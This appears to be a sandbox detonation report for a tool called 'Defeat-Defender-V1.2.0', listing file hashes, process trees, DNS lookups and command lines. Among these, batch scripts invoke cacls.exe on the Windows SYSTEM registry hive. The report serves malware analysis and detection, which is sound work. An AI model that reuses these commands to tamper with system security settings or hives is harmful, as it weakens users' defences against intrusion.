SHA512 0122d151a3142bb7ddf0d76a7b46ca28532830542968a4018dc5cda8b00eccd0db9b8195d1830e70202514b09a8701a62dd73e9a0489d90450f1e1d6dedc42e8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp

MD5 8168174f76dd892bb3fc28b8557401f1
SHA1 4afcad07c901dc90115b95196f4ca915fc340529
SHA256 d7086b4a856f33701eb705fdb7995d3b1b713e40b4ef09a017640c62de1ac113
SHA512 ed060937c742fc3501eeeb1b4a6741c9518acca34bc4ef815c53a32fa16e6899ccf7a27be8f508194e8a79dc5096eac556bca78e3d7f653bfcfe1880e32266fd

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs-1.js

MD5 4b03546a216a8974455c8101dc7d26a7
SHA1 ab052b6bc2506cf74bdf6c1dea0926602a578d22
SHA256 4dd67f19d9b5b4ca845ce420cafe5011330276228b20cb65ea84cd989ba0264d
SHA512 b0a05bc22b2167870949764b940da8bce45c5bd31a71ec8d9285c84b4ccda5898eac5b4ba0f072a3959b39ef20bc2811d4deb07b33ebc9d3f78424de25c44881

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin

MD5 fd9de7b9cfd31252e53842807939835b
SHA1 de4cbc9412899f5d969f1a69c71049342403db49
SHA256 4298537a25af075cb10b73f6ff9669756ca2ac967e572e98b51451bc2eb80616
SHA512 2b1254f2d1b773c6b8d034b035850bc1c9593d9a24ef2089efeea28c21799c7ce8648f9f4281804c48333b998349bdb28cf947e088cc4cd971b243ecfcc72819

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4

MD5 d328cfb915782830c3be2dcc808b652c
SHA1 c46cba55e09527952e0358f48243df23d0046b0b
SHA256 23eace026d3ef2f536df9f17aaae7a63b915bf4e55b2c239808d3726b9328039
SHA512 ca88a5dcacf2e03444c7de6b1fdb39f998bee760fc0431d034a57de860ba60c20840f79a2dbbd337ee7b312e79f2951768ff57f068bd8424924d90730b3b082a

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4

MD5 b3b0e0449805bb6a5f260b81c3c172b1
SHA1 983aadf04b69a81268f0c2917fe024d7c7d69af5
SHA256 cd2603ac2215af7b38b81eb80f71402f8e0969cad02273501aaa1f5f6415a103
SHA512 87dd1dd422bf1f5c7eb51887867f08041630f097a97ab5c74464ce07ef65fef8d8ecd68522af9fdfb47183f7ca4195b269b7634087fe774c0498ee100bb840c9

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240704-en

Max time kernel

119s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2572 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

94s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3104 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 3104 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"

C:\Windows\system32\cacls.exe

"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"

Network

Country Destination Domain Proto
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240729-en

Max time kernel

91s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 233.17.178.52.in-addr.arpa udp

Files

N/A